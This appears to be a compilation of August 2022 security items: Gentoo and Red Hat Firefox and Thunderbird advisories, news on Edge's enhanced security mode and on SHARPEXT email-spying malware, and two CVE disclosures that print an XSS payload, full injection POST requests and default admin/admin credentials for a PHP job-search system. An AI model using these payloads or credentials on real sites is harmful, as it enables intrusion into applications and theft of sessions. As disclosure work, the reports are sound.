Gentoo Linux Security Advisory 202208-8 - Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which could result in the arbitrary execution of code. Versions less than 91.12.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: August 10, 2022  
     Bugs: #834631, #834804, #836866, #842438, #846593, #849044, #857045, #861515  
       ID: 202208-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in Mozilla Firefox, the worst  
of which could result in the arbitrary execution of code.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 91.12.0:esr          >= 91.12.0:esr  
                                < 103.0:rapid          >= 103.0:rapid  
  2  www-client/firefox-bin     < 91.12.0:esr          >= 91.12.0:esr  
                                < 103.0:rapid          >= 103.0:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-91.12.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-91.12.0:esr"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-103.0:rapid"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-103.0:rapid"

References  
=========  
[ 1 ] CVE-2022-0843  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0843  
[ 2 ] CVE-2022-1196  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1196  
[ 3 ] CVE-2022-1529  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1529  
[ 4 ] CVE-2022-1802  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1802  
[ 5 ] CVE-2022-1919  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1919  
[ 6 ] CVE-2022-2200  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2200  
[ 7 ] CVE-2022-2505  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2505  
[ 8 ] CVE-2022-24713  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24713  
[ 9 ] CVE-2022-26381  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26381  
[ 10 ] CVE-2022-26382  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26382  
[ 11 ] CVE-2022-26383  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26383  
[ 12 ] CVE-2022-26384  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26384  
[ 13 ] CVE-2022-26385  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26385  
[ 14 ] CVE-2022-26386  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26386  
[ 15 ] CVE-2022-26387  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26387  
[ 16 ] CVE-2022-26485  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26485  
[ 17 ] CVE-2022-26486  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26486  
[ 18 ] CVE-2022-28281  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28281  
[ 19 ] CVE-2022-28282  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28282  
[ 20 ] CVE-2022-28283  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28283  
[ 21 ] CVE-2022-28284  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28284  
[ 22 ] CVE-2022-28285  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28285  
[ 23 ] CVE-2022-28286  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28286  
[ 24 ] CVE-2022-28287  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28287  
[ 25 ] CVE-2022-28288  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28288  
[ 26 ] CVE-2022-28289  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28289  
[ 27 ] CVE-2022-29909  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29909  
[ 28 ] CVE-2022-29910  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29910  
[ 29 ] CVE-2022-29911  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29911  
[ 30 ] CVE-2022-29912  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29912  
[ 31 ] CVE-2022-29914  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29914  
[ 32 ] CVE-2022-29915  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29915  
[ 33 ] CVE-2022-29916  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29916  
[ 34 ] CVE-2022-29917  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29917  
[ 35 ] CVE-2022-29918  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29918  
[ 36 ] CVE-2022-31736  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31736  
[ 37 ] CVE-2022-31737  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31737  
[ 38 ] CVE-2022-31738  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31738  
[ 39 ] CVE-2022-31740  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31740  
[ 40 ] CVE-2022-31741  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31741  
[ 41 ] CVE-2022-31742  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31742  
[ 42 ] CVE-2022-31743  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31743  
[ 43 ] CVE-2022-31744  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31744  
[ 44 ] CVE-2022-31745  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31745  
[ 45 ] CVE-2022-31747  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31747  
[ 46 ] CVE-2022-31748  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31748  
[ 47 ] CVE-2022-34468  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34468  
[ 48 ] CVE-2022-34469  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34469  
[ 49 ] CVE-2022-34470  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34470  
[ 50 ] CVE-2022-34471  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34471  
[ 51 ] CVE-2022-34472  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34472  
[ 52 ] CVE-2022-34473  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34473  
[ 53 ] CVE-2022-34474  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34474  
[ 54 ] CVE-2022-34475  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34475  
[ 55 ] CVE-2022-34476  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34476  
[ 56 ] CVE-2022-34477  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34477  
[ 57 ] CVE-2022-34478  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34478  
[ 58 ] CVE-2022-34479  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34479  
[ 59 ] CVE-2022-34480  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34480  
[ 60 ] CVE-2022-34481  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34481  
[ 61 ] CVE-2022-34482  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34482  
[ 62 ] CVE-2022-34483  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34483  
[ 63 ] CVE-2022-34484  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34484  
[ 64 ] CVE-2022-34485  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34485  
[ 65 ] CVE-2022-36315  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36315  
[ 66 ] CVE-2022-36316  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36316  
[ 67 ] CVE-2022-36318  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36318  
[ 68 ] CVE-2022-36319  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36319  
[ 69 ] CVE-2022-36320  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36320  
[ 70 ] MFSA-2022-14

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-08

Browser adds defense in depth to prevent abuse of unpatched vulnerabilities

Browser adds defense in depth to prevent abuse of unpatched vulnerabilities

Microsoft has introduced an optional feature to its Edge browser that applies more stringent security controls when users visit unfamiliar websites.

Enhanced security mode mitigates memory-related vulnerabilities by disabling just-in-time (JIT) JavaScript compilation, while activating additional operating system protections for the browser such as arbitrary code guard and hardware-enforced stack protection, according to Microsoft.

It said these changes provide “defense in depth” by making it harder for malicious sites to leverage unpatched vulnerabilities in order to write to executable code into memory.

RELATED Chromium site isolation bypass allows wide range of attacks on browsers

Microsoft said the provision of a “rich browsing experience using powerful technologies like JavaScript” heightens the risks of visiting malicious sites. “With enhanced security mode, Microsoft Edge helps reduce the risk of an attack by automatically applying more conservative security settings on unfamiliar sites and adapts over time as you continue to browse,” said Redmond.

**First of its kind**

Rival browsers Chrome and Firefox currently lack equivalent features, although can be configured to disable features such as JIT.

As for Safari, Apple recently announced a new security feature aimed at defending users at potential risk of highly targeted cyber-attacks that also disables JIT and other complex web technologies, unless the user excludes a trusted site. Called Lockdown Mode, this feature is designed to protect journalists, politicians, and human rights activists from spyware.

Catch up with the latest browser security news

The Microsoft Edge security team published analysis of the results of its experimentations with the new feature in August 2021 and February 2022.

The feature was rolled out in Microsoft Edge version 104, which was released August 5.

**Three levels of security**

The new feature, which is turned off by default, can be enabled as one of three modes.

In its ‘basic’ – and recommended – configuration, the feature applies “added security protection to the less visited sites”, but “preserves the user experience for the most popular sites on the web”, explained Microsoft.

Basic mode does not adapt according to user behavior. By contrast, ‘balanced’ mode “builds on user’s behavior on a particular device, and Microsoft’s understanding of risk across the web to give sites that users are most likely to use and trust full access to the web platform, while limiting what new and unfamiliar sites can do”.

Finally, the ‘strict’ setting applies enhanced safeguards universally against all sites. It isn’t recommended for most end users because of the additional configuration required for users “to complete their normal tasks”.

In all three modes, users can create exceptions for trusted websites, with enterprise admins able to create ‘allow’ and ‘deny’ lists.

Sites that use WebAssembly (WASM), a binary instruction format for stack-based virtual machines, are not currently supported by the feature. Sites that need WASM can be added to the exception site list.

An ‘added security’ banner appears in the URL navigation bar when enhanced security mode is activated for a particular site.

RECOMMENDED XSS in Gmail’s AMP For Email earns researcher $5,000

Microsoft Edge deepens defenses against malicious websites with enhanced security mode

By Waqas
Researchers have warned users of Gmail on Microsoft Edge and Google Chrome browser of a new email spying…
This is a post from HackRead.com Read the original post: Hackers Using SHARPEXT Browser Malware to Spy on Gmail and Aol Users

****Researchers have warned users of Gmail on Microsoft Edge and Google Chrome browser of a new email spying malware dubbed SHARPEXT.****

**Gmail** users should watch out for the newly discovered email reading malware named SHARPEXT. It is identified by cybersecurity firm Volexity. This nosey malware spies on AOL and Google account holders and can read/download their private emails and attachments.

**Campaign Details**

SHARPEXT malware infects devices through browser extensions on Google Chrome and Chromium-based platforms, including Korean browser Naver Whale and Microsoft Edge. Its primary targets are users in the USA, South Korea, and Europe, while its origin has been traced to a North Korean hacker group called Kimsuky or SharpTongue, which is associated with the North Korean intelligence agency Reconnaissance General Bureau.

The typical targets of SHARPEXT malware include those working in nuclear weaponry. It is worth noting that **in Jun 2021**, Kimsuky APT was found targeting the South Korean atomic agency by exploiting VPN flaws. **In March 2015**, the same group was blamed for targeting South Korea’s Kori nuclear plant and leaking sensitive data on Twitter.

As for SHARPEXT; the malware can directly inspect and exfiltrate data from Gmail accounts and impact version 3.0. This campaign has been active for more than a year, and during this time, it has stolen thousands of files and messages from Gmail and AOL email accounts.

The malware is currently targeting Windows devices, but Volexity claims it may work on Linux and macOS devices too.

**How the Attack Occurs?**

The victims are lured into opening a document that contains the malware. The malware is distributed through **social engineering** and spear phishing scams.

> “Prior to deploying SHARPEXT, the attacker manually exfiltrates files required to install the extension (explained below) from the infected workstation. SHARPEXT is then manually installed by an attacker-written VBS script.”
> 
> Paul Rascagneres, Thomas Lancaster – Volexity Threat Research

According to Volexity’s **blog post**, once installed on the device, SHARPEXT malware inserts itself within the browser via the Preferences and Secure Preferences files. It then enables its email read/download capabilities. Moreover, it also hides warning alerts that may be displayed to notify the user about the presence of an unverified extension on the device.

For your information, SHARPEXT malware-laced extensions are hard to spot since there’s no such thing in it that could trigger an antivirus scanner response, and the actual threat runs from another server.

Process workflow of SHARPEXT malware (Image: Volexity)

1.  **Gmail wittingly storing your online purchase data for years**
2.  **Google vulnerability allowed sending spoofed emails with Gmail ID**
3.  **Hackers using malicious Firefox extension to phish Gmail credentials**
4.  **Popular Android Zombie game phishing users to steal Gmail credentials**
5.  **Microsoft MSHTML flaw exploited in Gmail and Instagram phishing scam**

**How to Stay Protected?**

Volexity has published a list of IoCs (indicators of compromise) on **Github** to help you identify if the device has been infected already. You may also inspect all the browser extensions installed and check if all of them can be found on Chrome Web Store.

Furthermore, Remove any extensions that look suspicious, or you downloaded from an unreliable source. Always use the best antivirus solutions to keep your device protected.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Hackers Using SHARPEXT Browser Malware to Spy on Gmail and Aol Users

Complete Online Job Search System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the U_NAME parameter at /category/controller.php?action=edit.

Permalink

Cannot retrieve contributors at this time

**Complete Online Job Search System v1.0 by campcodes.com has Cross-Site Scripting (XSS)**

**Vul\_Author**: **Liyu Chen**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/user/controller.php

Vulnerability location: /eris/admin/user/controller.php?action=edit, U\_NAME

\[+\] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

POST /eris/admin/user/controller.php?action\=edit HTTP/1.1
Host: 10.10.10.134
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: http://10.10.10.134
DNT: 1
Connection: close
Referer: http://10.10.10.134/eris/admin/user/index.php?view=edit&id=2018001
Cookie: PHPSESSID=vf7g6ffd2s4el0u0gia3elgg14
Upgrade-Insecure-Requests: 1
USERID=2018001&deptid=&U\_NAME=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&deptid=&U\_USERNAME=Narciso&deptid=&U\_PASS=123&U\_ROLE=Administrator&save=

CVE-2022-35163: bug_report/XSS.md at main · chen-liyu/bug_report

Complete Online Job Search System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the CATEGORY parameter at /category/controller.php?action=edit.

Permalink

Cannot retrieve contributors at this time

**Complete Online Job Search System v1.0 has Cross-Site Scripting (XSS)**

**Vul\_Author**: **Yingsha Xu**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/category/controller.php

Vulnerability location: /eris/admin/category/controller.php?action=edit, CATEGORY

\[+\] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

POST /eris/admin/category/controller.php?action\=edit HTTP/1.1
Host: 10.10.10.134
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://10.10.10.134
DNT: 1
Connection: close
Referer: http://10.10.10.134/eris/admin/category/index.php?view=edit&id=24
Cookie: PHPSESSID=vf7g6ffd2s4el0u0gia3elgg14
Upgrade-Insecure-Requests: 1
CATEGORYID=24&CATEGORY=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&save=

CVE-2022-35162: bug_report/XSS.md at main · xysasa/bug_report

Red Hat Security Advisory 2022-5766-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 91.12.0 ESR. Issues addressed include a spoofing vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:5766-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5766  
Issue date:        2022-08-01  
CVE Names:         CVE-2022-2505 CVE-2022-36318 CVE-2022-36319  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 91.12.0 ESR.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1  
(CVE-2022-2505)

* Mozilla: Directory indexes for bundled resources reflected URL parameters  
(CVE-2022-36318)

* Mozilla: Mouse Position spoofing with CSS transforms (CVE-2022-36319)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2111907 - CVE-2022-36319 Mozilla: Mouse Position spoofing with CSS transforms  
2111908 - CVE-2022-36318 Mozilla: Directory indexes for bundled resources reflected URL parameters  
2111910 - CVE-2022-2505 Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-91.12.0-2.el8_1.src.rpm

ppc64le:  
firefox-91.12.0-2.el8_1.ppc64le.rpm  
firefox-debuginfo-91.12.0-2.el8_1.ppc64le.rpm  
firefox-debugsource-91.12.0-2.el8_1.ppc64le.rpm

x86_64:  
firefox-91.12.0-2.el8_1.x86_64.rpm  
firefox-debuginfo-91.12.0-2.el8_1.x86_64.rpm  
firefox-debugsource-91.12.0-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2505  
https://access.redhat.com/security/cve/CVE-2022-36318  
https://access.redhat.com/security/cve/CVE-2022-36319  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuqtD9zjgjWX9erEAQiVVBAAlwFmT2vc3sENgpmZ+8/q8ZVoBTf1mPDw  
uncOUQpxdt2F09swMu+yigMmxl/bhhOY6rpBh3pgWswkpfKRAuNDmDZCmeyjQv7C  
UcR+DOVggFiSrwt2SAbWLEnOE6+H6gddpyXIZqaUcIesEtopHy65ZN51pZMCv9HF  
D2s63iapGQJ3/ZsiQBEGWpxsnGbP2lNCc9GYtXXAJdj8EcBX5bBCCRxD3QUtT0EW  
2M6RDsUJOp1XndO4hQ7w4EuMbqKyUb2/rAywSpgrAOksLscBz+m/JcXraiERz0IB  
DzER4GBXPhZshALzWhHGJbOsezodYMureyHdusm/KLF233d+wQsfirOojt+eGQ40  
NFvZcxBukRViXILyF8DCrxARN5zDqEJDB6NNZ0BolSVLLGJTXYk9eb5iQRCQGI/s  
sCL8DpfGyCq09ZmvWvm9oQJYj5UG1b0D2MWHN5UT4zL2rRqEdhcSgVkEac2HAg04  
pyjxlcfHCat48g2UxjdTgRiQ8p0Ugaw1kTRq2QmCzceEfWAJTg7YUGJJYp9e56jq  
ihWOLc0JUcD3L2GRKVWmi7RhI+j/ubzS58g+mOOdFB/hZm0xckhrYx86O+Nm1BiA  
pjjt5rPE+qN87KTYRD/89Cq7xqKAZ//Gd/tdF6F+21YD/9jYFzEftiHzZ4kuWi+W  
FYZF4CvZp00<tG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5766-01

Red Hat Security Advisory 2022-5778-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.12.0. Issues addressed include a spoofing vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:5778-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5778  
Issue date:        2022-08-01  
CVE Names:         CVE-2022-2505 CVE-2022-36318 CVE-2022-36319  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.12.0.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1  
(CVE-2022-2505)

* Mozilla: Directory indexes for bundled resources reflected URL parameters  
(CVE-2022-36318)

* Mozilla: Mouse Position spoofing with CSS transforms (CVE-2022-36319)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2111907 - CVE-2022-36319 Mozilla: Mouse Position spoofing with CSS transforms  
2111908 - CVE-2022-36318 Mozilla: Directory indexes for bundled resources reflected URL parameters  
2111910 - CVE-2022-2505 Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-91.12.0-1.el9_0.src.rpm

aarch64:  
thunderbird-91.12.0-1.el9_0.aarch64.rpm  
thunderbird-debuginfo-91.12.0-1.el9_0.aarch64.rpm  
thunderbird-debugsource-91.12.0-1.el9_0.aarch64.rpm

ppc64le:  
thunderbird-91.12.0-1.el9_0.ppc64le.rpm  
thunderbird-debuginfo-91.12.0-1.el9_0.ppc64le.rpm  
thunderbird-debugsource-91.12.0-1.el9_0.ppc64le.rpm

s390x:  
thunderbird-91.12.0-1.el9_0.s390x.rpm  
thunderbird-debuginfo-91.12.0-1.el9_0.s390x.rpm  
thunderbird-debugsource-91.12.0-1.el9_0.s390x.rpm

x86_64:  
thunderbird-91.12.0-1.el9_0.x86_64.rpm  
thunderbird-debuginfo-91.12.0-1.el9_0.x86_64.rpm  
thunderbird-debugsource-91.12.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2505  
https://access.redhat.com/security/cve/CVE-2022-36318  
https://access.redhat.com/security/cve/CVE-2022-36319  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuqtU9zjgjWX9erEAQicng//b/BsXxUqc7TqKspEoGUbs4q+BirSlgVa  
ulGBprxWLroeNF+ClaBllNC/6ZQtITJjfUoT4hOYw32tZYxShATN0ObmWOFnL3k+  
8aQp+5eh1cXdaO0JM6c35p6i/gxaX1r3cJM8pDpxzQO84AMMxPz8xYrqYFv5MpJ9  
dpve2SkOKvKLyn51KbkKGbXsaYjJ6/leLWGKBbfXrowplWLEeVyquxwpwHlHtfRh  
91ZKuTWqMIlo3UOckEwatxyNA35UzyhtIgJcvMPdnCHozOIBgPWs3X0657IV6lar  
k8Y05GJqLPHdSHAnu5YrF8Mb3DL9ydXoaZ0F8DHZrCqoGboLINSFle8B/BPjkyiI  
oeLxRWSYMEWN5O3YgdZvff1x/8c0Xjb2grJaLWZNqIHimUZTDlDZ4gvCCqRWKDe0  
Lm+esw6kSiiBlG4LIjWTPAu6F/XQlzT53EvmzNshRUmxPdEa7gdLTt22Qz0x1qem  
t7nauhS5eUcsPEBfaJO8vJH8qfCBlop2Fxw7b9m+VsGz7Sf5Kq/9C78YyX1ghheU  
eXs41vlrRU/femYEyKidpg2D3eCdXrfeofEeEWPKHHZHKqUrjJywt+HfLkzlCfUW  
Bfe0nuXMKCE73+v96x3yvNXlYvcWPK4M4o10wpYKi7UmFdJ29fnJKZbFoI36Qm0k  
sARyBN3xic8=tFXV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5778-01

Red Hat Security Advisory 2022-5765-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 91.12.0 ESR. Issues addressed include a spoofing vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:5765-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5765  
Issue date:        2022-08-01  
CVE Names:         CVE-2022-2505 CVE-2022-36318 CVE-2022-36319  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 91.12.0 ESR.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1  
(CVE-2022-2505)

* Mozilla: Directory indexes for bundled resources reflected URL parameters  
(CVE-2022-36318)

* Mozilla: Mouse Position spoofing with CSS transforms (CVE-2022-36319)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2111907 - CVE-2022-36319 Mozilla: Mouse Position spoofing with CSS transforms  
2111908 - CVE-2022-36318 Mozilla: Directory indexes for bundled resources reflected URL parameters  
2111910 - CVE-2022-2505 Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
firefox-91.12.0-2.el8_2.src.rpm

aarch64:  
firefox-91.12.0-2.el8_2.aarch64.rpm  
firefox-debuginfo-91.12.0-2.el8_2.aarch64.rpm  
firefox-debugsource-91.12.0-2.el8_2.aarch64.rpm

ppc64le:  
firefox-91.12.0-2.el8_2.ppc64le.rpm  
firefox-debuginfo-91.12.0-2.el8_2.ppc64le.rpm  
firefox-debugsource-91.12.0-2.el8_2.ppc64le.rpm

s390x:  
firefox-91.12.0-2.el8_2.s390x.rpm  
